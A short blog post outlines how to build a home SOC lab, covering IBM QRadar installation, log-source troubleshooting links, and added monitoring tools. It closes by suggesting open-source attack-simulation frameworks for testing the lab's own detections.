Davinder Tutorials

This blog is all about Cyber Security and IT

Wednesday, March 29, 2023

How to Study Cyber SOC at home in 2023

  March 29, 2023    

Below is the complete guide to help you study cyber SOC at home.

Lets install SIEM First:

 There are various SIEM in the market like: QRadar, Graylog, ELK, Splunk, SumoLogic etc but we will example of Q RADAR

Download >https://lnkd.in/d7ATK9ND
install >https://lnkd.in/dWe7gZ7f

All material you need:- 


If you encounter any of these issues below, I've collected the solutions.

. install WinCollect Agent another way:
https://lnkd.in/dA34UhEV |
https://lnkd.in/db_7ai_j

. send Linux logs to Qradar
https://lnkd.in/dnc6HYw9

. No Log Activity | Qradar CE 
https://lnkd.in/dTa2kFrM

. No Log Activity | Qradar Code:
https://lnkd.in/d3ZSVzx3

. Logs source problem:
https://bit.ly/3QyysPD

. Modify maximum Log size using Group Policy
https://lnkd.in/dmD7jqGK


. Rule creation, use case creation Basic in Qradar SIEM
https://lnkd.in/daWJmTu3 |
https://ibm.co/3DwndEq

✔️ Don't forget to generate an Authentication token from AS to write in WinCollect Agent when you install it

✔️ where logs and events from Windows, Linux, DB,..,etc :
 . DSM Configuration Guide: https://ibm.co/3dhP9Bl
Does it work? Great! That is a mini SOC. Document it somewhere and link it to your resume.🙏


------> Additional steps: <------

- Increase log visibility (activate PowerShell logging, Scriptblock logging, install Sysmon, etc)

- Install extra tools to get more visibility e.g.: Bluespan, DeepBlueCLI, Suricata Zeek, RITA (all are on GitHub)

- Test your setting! Be a bad guy and try to catch yourself. (WinPwn, Atomic Red Team, Caldera -> again, check out GitHub)

- If needed improve your SIEM with matching alert rules and build Dashboards. (Ideas? Look at Sigma rules -> GitHub)


  No Comments

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)